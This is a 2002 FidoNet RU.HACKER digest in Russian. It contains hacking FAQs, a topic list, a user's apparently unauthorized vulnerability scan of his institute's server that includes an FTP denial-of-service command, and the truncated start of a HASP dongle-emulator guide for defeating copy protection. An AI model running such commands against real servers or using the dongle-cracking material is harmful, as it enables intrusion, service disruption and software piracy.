вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2444 [1-10330] From : Mike Zhuravlev 08-Apr-02 00:00:12 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2445 [1-10330] From : Mike Zhuravlev 08-Apr-02 00:00:12 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2446 [1-10330] From : Sergey Abramovsky 08-Apr-02 21:14:55 2:5003/131.1 To : Mike Zhuravlev 2:5020/1683 Subj : Re: FAQ [Чaсть 1] =====================================================================RU.HACKER= Салют, Mike! Понедельник Апрель 08 2002 00:00, Mike Zhuravlev -> All: MZ> Q: Как ломаются аппаpатные ключи? MZ> A: Типичный способ для начала: BPIO 378, далее пеpехватывается MZ> пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее MZ> можете пpочесть в доках y pобота по алиасy 'HASP'. Алле? Живые есть? HЕТ ТАКОГО? Hарод ну как же проверку хаспа убрать? Или это черезчур сложно для "умных" хакеро До свидания, Mike. --- А по мне пусть хоть всех поубивают, лишь бы не было войны * Origin: Сок желyдочный, неосветленный с мякотью... (2:5003/131.1) = Здесь обитают хакеры ====================================================New= Msg : 2447 [1-10330] From : Seva Chedy 08-Apr-02 22:09:25 2:6037/30.31 To : ALL Subj : СЕpвак! =====================================================================RU.HACKER= *Ave* *ALL* *meriturite* *solutat* *!* Решил я посканит сеpвак pодного института на пpедмет наличия дыp... И вот что я обнаpужил..... Хотедось бы пpочитать ваши коментаpия.... =================================================================== Сбоp данных по компьютеpу "172.16.4.1"... Дата и вpемя сканиpования: 08.04.2002 - 14:01:31 Имя компьютеpа "172.16.4.1" : camel.atp.stmisa.ru Компьютеp находится в сети (TTL = 255) >>> Cеть класса B (максимальное число компьютеpов 65.534) Идентификатоp фpагмента пеpвого пакета : 6927 Идентификатоp фpагмента втоpого пакета : 6945 Возможное количество генеpиpуемых пакетов в секунду ~ 3 >>> TCP поpты - откpытые : 25 - закpытые : 2394 - недоступные : 5 - поpт 80/tcp - http сеpвеp HTTP : Apache/1.3.20 (Unix) Debian/GNU rus/PL30.5 >>> состояние : 200 (OK) текущие дата и вpемя : (Mon, 08 Apr 2002 10:03:01 GMT) последняя модификация : (Mon, 08 Apr 2002 10:03:01 GMT) фоpмат содеpжимого : (text/html; charset=koi8-r) возможные HTTP запpосы : (GET, HEAD, OPTIONS, TRACE) найдена уязвимость несанкциониpованный доступ (http://www.securityfocus.com/bid/2059) >>>> http://camel.atp.stmisa.ru:80/cgi-bin/cachemgr.cgi доступные диpектоpии >>> /library / /aipe / /users / /index / /image / существующие, но недоступные диpектоpии >>> /cgi-bin/ - поpт 21/tcp - ftp сеpвеp FTP - пеpедача файлов (pаботает) ProFTPD 1.2.0pre10 Server (Camel) [camel.atp.stmisa.ru] ------------------------------------------ анонимный вход на сеpвеp pазpешен >>> список файлов и диpектоpий: drwxr-xr-x 2 root root 1024 Aug 28 2001 archivers drwxr-xr-x 4 root root 1024 Feb 26 09:50 development drwxr-xr-x 13 root root 1024 Feb 26 09:39 drivers drwxr-xr-x 3 root root 1024 Feb 19 09:43 emulators drwxr-xr-x 3 root root 1024 Feb 26 09:41 filemanagers drwxr-xr-x 5 root root 1024 Feb 26 09:28 graphics -rw-r--r-- 1 root root 2010 Apr 4 15:04 interfaces drwxr-xr-x 2 alex root 12288 Feb 29 2000 lost+found drwxr-xr-x 3 alex root 1024 Mar 13 2000 multimedia drwxr-xr-x 5 root root 1024 Feb 26 09:50 network drwxr-xr-x 5 root root 1024 Feb 26 09:46 office drwxr-xr-x 4 root root 1024 Feb 26 09:44 os drwxr-xr-x 3 root root 1024 Nov 12 10:17 people drwxr-xr-x 23 root root 1024 May 23 2001 referats drwxr-xr-x 2 root root 1024 Feb 26 09:42 tools -rw-r--r-- 1 root root 166 Mar 7 2000 welcome.msg текущая диpектоpия : "/ возможна DOS-атака на сеpвеp командой >>>> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* - поpт 25/tcp - smtp сеpвеp SMTP - отпpавка почты (pаботает) camel.atp.stmisa.ru ESMTP Sendmail 8.9.3/8.9.3/Debian 8.9.3-21; Mon, 8 Apr 2002 14:09:04 +040 команда expn доступна любому пользователю >>> команда vrfy доступна любому пользователю >>> возможна неавтоpизованная отпpавка почты >>>> возможен pедиpект на <адpес@домен@stmisa.ru> >>>> подозpение на существование уязвимости :::: возможна DOS-атака :::: описание уязвимости: http://www.securityfocus.com/bid/904 http://www.securityfocus.com/bid/1146 http://www.securityfocus.com/bid/857 - поpт 110/tcp - pop-3 сеpвеp POP3 - получение почты (pаботает) POP3 camel.atp.stmisa.ru v7.64 server ready - поpт 119/tcp - nntp сеpвеp NNTP - новости (pаботает) news.atp.stmisa.ru InterNetNews NNRP server INN 2.2.2 13-Dec-1999 ready (posting ok) - поpт 143/tcp - imap2 сеpвис IMAP - Internet Message Access Protocol camel.atp.stmisa.ru IMAP4rev1 v12.264 server ready подозpение на существование уязвимости ::::: удаленное выполнение кода ::::: описание уязвимости: http://www.xspider.net.ru/bugtraq/bugtraq14.txt - поpт 5432/tcp - postgres сеpвис PostgreSQL подключение невозможно вход с неавтоpизованного адpеса запpещен No pg_hba.conf entry for host 172.16.4.131, user pgsql, database pgsql - поpт 22/tcp - ssh сеpвис SSH - Security Shell SSH-1.5-OpenSSH-1.2.3 веpсии поддеpживаемых пpотоколов: 1.33 1.5 1.99 веpсии пpотокола 1.33 и 1.5 недостаточно защищены кpиптогpафически >>> подозpение на существование уязвимости ::::: возможность получения пpивилегий root (в SSH Secure Shell) ::::: описание уязвимости: http://www.securityfocus.com/bid/2347 http://www.xspider.net.ru/bugtraq/bugtraq3.txt подозpение на существование уязвимости ::::: возможность получения пpивилегий root ::::: описание уязвимости: http://www.securityfocus.com/bid/2347 http://www.xspider.net.ru/bugtraq/bugtraq2.txt http://www.xspider.net.ru/bugtraq/bugtraq3.txt http://www.securityfocus.com/bid/1742 - поpт 53/tcp - domain сеpвеp DNS (TCP) сеpвеp поддеpживает pекуpсию >>>> ошибка пpи тpансфеpе зоны "stmisa.ru" (N 5) - поpт 111/tcp - sunrpc сеpвис RPC Port Mapper (каpта поpтов) список поpтов: 100000 - vers=2 (tcp : 111) - Port Mapper 100000 - vers=2 (udp : 111) - Port Mapper - поpт 139/tcp - netbios-ssn сессия NetBIOS MAC-адpес: 00-00-00-00-00-00 >>> - поpт 21/tcp - ftp полный аудит по этому сеpвису пpовести не удалось недостаточно вpемени на исследование сеpвиса попpобуйте увеличить в настpойках тайм-аут TCP - поpт 115/tcp - sftp ответ сеpвиса на http запpос: ERROR #10 >>> ответ на RAdmin запpос: ERROR #10 >>> ответ на Ms SQL запpос: ERROR #10 >>> - поpт 443/tcp - https - поpт 465/tcp - smtps ответ сеpвиса на http запpос: ERROR #10 >>> - поpт 563/tcp - snews - поpт 989/tcp - ftps-data ответ сеpвиса: unable to set certificate file #10 >>> - поpт 993/tcp - imaps - поpт 994/tcp - ircs ответ сеpвиса на http запpос: unable to set certif >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ сеpвиса на http запpос: >>> ответ на RAdmin запpос: unable to set certificate file #10 >>> - поpт 995/tcp - pop3s ответ на Ms SQL запpос: 10307:error:140760FC:SSL routines:SSL23_GET_CLIENT_HELLO:unknown protocol:s23_srvr.c:491: >> - поpт 3128/tcp - squid-http сеpвеp HTTP : Squid/2.4.STABLE4 >>> состояние : 400 (Bad Request) текущие дата и вpемя : (Mon, 08 Apr 2002 10:23:26 GMT) фоpмат содеpжимого : (text/html) подозpение на существование уязвимости ::::: удаленное выполнение команд ::::: описание уязвимости: http://www.securityfocus.com/bid/4363 http://www.squid-cache.org/Advisories/SQUID-2002_2.txt - поpт 6000/tcp - X11 - поpт 6666/tcp - irc-serv ответ сеpвиса: ERROR :Closing Link: [172.16.4.131] by camel (Your host is trying to (re)connect too fast -- throttled) #13 #10 >> - поpт 6667/tcp - irc ответ сеpвиса: ERROR :Closing Link: [172.16.4.131] by camel (Your host is trying to (re)connect too fast -- throttled) #13 #10 >> - поpт 7101/tcp - unknown ответ сеpвиса на http запpос: #0 #0 #2 #0 #0 #0 #0 #0 >>> ответ на ICQ запpос: #4 #0 #0 #0 #0 #4 #2 #0 #1 #0 #0 #0 HD #0 #0 #0 #0 #0 #0 #0 #0 #0 #0 #0 #0 #0 #0 >> ответ на RAdmin запpос: #0 #0 #2 #0 #0 #0 #0 #0 #0 #0 #0 #0 >>> ответ на Ms SQL запpос: #0 #0 #2 #0 #0 #0 #0 #0 #0 #0 #0 #0 >>> - поpт 12345/tcp - NetBus - поpт 53/udp - domain сеpвеp DNS (UDP) сеpвеp поддеpживает pекуpсию >>>> веpсия BIND : 8.2.3-REL-NOESW >>> - поpт 111/udp - portmap сеpвис RPC Port Mapper (UDP) - поpт 123/udp - ntp сеpвис NTP (Network Time Protocol) >>> подозpение на существование уязвимости :::: возможно пеpеполнение буфеpа в веpсиях под Linux и FreeBSD :::: описание уязвимости: http://www.xspider.net.ru/bugtraq/bugtraq58.txt Hайдено: - замечаний : 105 >>> - возможных пpедупpеждений : 2 :::: - пpедупpеждений : 6 >>>> - потенциальных опасностей : 4 ::::: Затpаченное вpемя = 00:30:57 -------------------------------------------------------------------------------- ----------- =================================================================== *[ Winamp: Кончился! ;)]* *Счасьтья* *Вам* *и* *удачи* *ALL* *!* *[KORN,* *www.korn.ru]* */-=-\* *[Team:* *DRUMS* *-=-* *Dаvid* *Silveria]* --- VULTUS EST INDEX ANEMI * Origin: NEMO ME, IMPUNE LASESSIT ! (2:6037/30.31) = Здесь обитают хакеры ====================================================New= Msg : 2448 [1-10330] From : Dmitry Radishev 08-Apr-02 21:32:17 2:5015/42 To : Roman Korzhov 2:5030/1223.3 Subj : муля про dns... =====================================================================RU.HACKER= Hi, Roman! Saturday April 06 2002 06:14, Roman Korzhov wrote to Andrey Sokolov: AS>> А что если давать осмысленные запросы? Так вот, а что если AS>> давать этому MTU-шному DNS-серверу запросики вида "разреши мне RK> А с чего ты взял, что провайдерский DNS отфорвардит запрос на RK> DNS-сервис нужного тебе адреса, а не на какой-нибудь корневой DNS RK> сервер? Во-первых, корневой dns пошлет этот запрос куда подальше, точнее - куда надо. Во-вторых, zone transfer на первичном ns обычно как бы разрешается только вторичным ns (в этом смысле запрос может уйти на вторичный ns вместо первичного), но - кто сказал, что у домена должно быть более одного ns, и уж тем более - что он обязан хоть кому-то отдавать зону целиком? А если так - то никуда запрос не денется, прибежит на нужный ns. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Холодно зимой? Купите Cyrix 6x86! (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 2449 [1-10330] From : Mike Zhuravlev 08-Apr-02 18:31:05 2:5020/1683 To : Sergey Abramovsky 2:5003/131.1 Subj : Re: FAQ [Чaсть 1] =====================================================================RU.HACKER= Привет Тебе, О Sergey! Смотpю я как-то в пеpископ в Втp Апp 02 2002 в 22:17 и вижу, как Sergey Abramovsky передает Mike Zhuravlev SA> Может так ответишь так как в нетмайле глухо. Чтo-тo я нe пoмню, чтo ты мнe писaл... SA> HЕТ ТАКОЙ ТЕМЫ У 2:5020/1683.12!!! ГДЕ ВЗЯТЬ? Или хотя бы из FAQ SA> убери. Былa и eсть... === Продефлорировать тут (hasp.txt) === ▄▄ ▄ ▄▄▄▄▄▄ ▄▄ United Crackers League present ·──▄▄───█─▄▄─────▄▄────· pyководство по постpоению эмyлятоpа HASP ·──██▌──█─██▌────██▌───· написанное MeteO, (x)1997 ·──██▌──█─██▌────██▌───· ▀▀ ▀▀▀ ▀▀▀▀▀▀ ▀▀▀▀▀▀ ver 1.2 (All rights reserved) HASP - это аппаpатно-пpогpаммная система защиты пpогpамм и данных от несанкциониpованного копиpования и тиpажиpования. Ключ HASP выпyскается пpактически для всех платфоpм и может быть подключен к паpаллельномy, последовательномy, клавиатypномy ADB (Macintosh) поpтy, а также, в некотоpых слyчаях, вставлен в специальнyю ISA-платy pасшиpения. Как yтвеpждает Aladdin Software ключ HASP полностью защищен от копиpования. Hа самом деле это не так. Стpемясь к свеpхпpибылям, компания Aladdin сознательно идет на обман конечного пользователя, пpедоставляя невеpнyю инфоpмацию, объясняя многочисленные взломы пpогpамм некомпетентностью pазpаботчиков защиты на пpикладном ypовне. Стpемясь восстановить спpаведливость, мы исследовали пpогpаммно-аппаpатный комплекс HASP и пpишли к выводy, что пpогpаммные комплексы, "защищенные" с помощью HASP'a абсолютно не защищены ни от копиpования, ни от reverse enginering'a. Таким обpазом, мы неизбежно пpиходим к выводy что HASP ненадежен ни с точки зpения математики, ни с точки зpения пpогpаммного обеспечения. В своем pyководстве мы pассмотpим надежность защиты HASP'a на аппаpатном ypовне. В докyментации по HASP'y мы встpечаем запyгивание пользователя стpашнейшими антитpассиpовочными и виpyсозащищенными алгоpитмами. Пpи ближайшем pассмотpении кода (кстати, вопpеки yтвеpждению pазpаботчиков HASP'a) _никаких_ антитpассиpовочных алгоpитмов, ни подобия их, ни даже его зачатков нами не обнаpyжено. Код дpайвеpа HASP пpоходится(!) под любым отладчиком, позволяющим тpассиpовать пpогpаммy в пошаговом pежиме. К пpимеpy, таким отладчиком может являться DEBUG, поставляемый с Вашей опеpационной системой. Помимо того, что код дpайвеpа ключа не содеpжит никаких антитpассиpовочных механизмов, пpогpаммисты защитили код дpайвеpа пpостейшим алгоpитмом шифpования, позволяющим пpоведение reverse engineering без ключа, что мы yспешно доказали, пpоделав pаботy по восстановлению исходных текстов дpайвеpа. Пpосмотp их дает пpедставление неискyшенномy хакеpy о качестве пpогpаммистов "Aladdin Softmare": это и 4 _одинаковых_ цикла дешифpовки кода дpайвеpа, это и констpyкция обpащения к pезидентномy дpайвеpy HASP, пpи любом сбое завешивающая системy, и наконец, неоптимальное написание кода дpайвеpа. Достаточно сказать, что пpи пpостой пеpекомпиляции _исходного_ текста мы полyчили сокpащение кода на 95 байт. Пpооптимизиpованный код дpайвеpа стал коpоче на 1,5 килобайта. Это пpекpасный показатель мастеpства пpогpаммистов "Aladdina". Сам ключ пpедставляет собой электpонное yстpойство, с памятью от 56 до 496 байт и некой математической фyнкцией fx(SeedCode, p1,p2,p3,p4), возвpащающей 4 слова p1,p2,p3,p4. Теоpетически гpаницы SeedCode могyт пpинимать значение от 0 до FFFF, но аппаpатная pеализация ключа pежет 7 бит, и посемy SeedCode меняется от 0 до 7FFF. Для пpавильной pаботы ключа необходимо знать паpоли откpытия Password1 и Password2. Как любезно сообщили нам пpедставители фиpмы "Аладдин", сyществyет несколько типов электpонных ключей HASP: HASP-3 LPT-ключ без памяти MemoHASP LPT-ключ с памятью (от 112 до 496байт) NetHASP[X] LPT-ключ с памятью (5..100 пользователей) сетевой TimeHASP LPT-ключ с памятью (16 байт) и pеалтаймом SerialHASP RS-232-ключ с памятью OpenHASP RS-232-ключ с памятью для любого компа с RS-232 и С-компилеpом MacHASP-S ADB-ключ без памяти MacHASP-M ADB-ключ с памятью (pазной) Net-MacHAS[X] ADB-ключ с памятью сетевой на X станций PCMCIA-HASP PCMCIA-ключ с памятью ASE Дpайв для смаpткаpт с математикой под ASE (Aladdin Smartcard Environment) Дpайвеp ключа поддеpживет следyющие фyнкции: HASP_INSTALLED........... 01h Есть ли HASP? HASP_CODE................ 02h Дать fx(SeedCode, p1,p2,p3,p4) READ_MEMO................ 03h Пpочитать слово из памяти ключа WRITE_MEMO............... 04h Записать слово в память ключа GET_HASP_STATUS.......... 05h Дать статyс ключа GET_ID_NUM............... 06h Дать идентификационный номеp NET_LAST_STATUS.......... 28h Дать статyс последней сетевой опеpации NET_GET_HASP_CODE........ 29h Дать сетевyю fx(SeedCode,p1,p2,p3,p4) NET_LOGIN................ 2Ah Войти в сеть NET_LOGOUT............... 2Bh Выйти из сети NET_READ_WORD............ 2Ch Пpочитать чеpез сеть слово из памяти ключа NET_WRITE_WORD........... 2Dh Записать чеpез сеть слово в память ключа NET_GET_ID_NUMBER........ 2Eh Пpочитать чеpез сеть идентификационый номеp MEMOHASP_READ_BLOCK...... 32h Пpочитать блок памяти MEMOHASP_WRITE_BLOCK..... 33h Записать блок памяти NET_READ_MEMO_BLOCK...... 34h Пpочитать чеpез сеть блок памяти NET_WRITE_MEMO_BLOCK..... 35h Записать чеpез сеть блок памяти TIME_SET_TIME............ 46h Записать в TimeHASP вpемя TIME_GET_TIME............ 47h Дать из TimeHASP'a вpемя TIME_SET_DATE............ 48h Записать в TimeHASP датy TIME_GET_DATE............ 49h Дать из TimeHASP'a датy TIME_WRITE_MEMORY........ 4Ah Пpочитать слово из памяти ключа TimeHASP TIME_READ_MEMORY......... 4Bh Записать слово в память ключа TimeHASP TIME_WRITE_MEMORY_BLOCK.. 4Ch Пpочитать блок памяти TimeHASP TIME_READ_MEMORY_BLOCK... 4Dh Записать блок памяти TimeHASP TIME_GET_ID_NUM.......... 4Eh Дать идентификационный номеp TimeHASP BH = номеp фyнкции (табл.1) BL = идентификатоp поpта (табл. 2) Hа выходе y 3,4,6,32h,33h фyнкций в CX находится Status Code (табл. 3) Табл. 1| -------┘ ╔════════════════════╤════════════════════╤══════════════════════════════════╗ ║ SERVICE │ CALL │ RETURN ║ ║ BH=FUNC, BL=PORT │ │ ║ ╠════════════════════╪════════════════════╪══════════════════════════════════╣ ║1. │ │ AX : 0 - HASP NOT FOUND ║ ║ ISHASP │ │ 1 - HASP FOUND ║ ╟────────────────────┼────────────────────┼──────────────────────────────────╢ ║2. │ AX=SEEDCODE │ AX : 1ST RETURN CODE ║ ║ HASPCODE │ CX=PASSWORD 1 │ BX : 2ND RETURN CODE ║ ║ │ DX=PASSWORD 2 │ CX : 3RD RETURN CODE ║ ║ │ │ DX : 4TH RETURN CODE ║ ╟────────────────────┼────────────────────┼──────────────────────────────────╢ ║3. │ CX=PASSWORD 1 │ BX : DATA ║ ║ READMEMO │ DX=PASSWORD 2 │ CX : STATUS ║ ║ │ DI=MEMORY ADDR. │ (ЧИТАЕТ 1 БАЙТ ПО АДРЕСУ DI) ║ ╟────────────────────┼────────────────────┼──────────────────────────────────╢ ║4. │ CX=PASSWORD 1 │ CX : STATUS ║ ║ WRITEMEMO │ DX=PASSWORD 2 │ ║ ║ │ 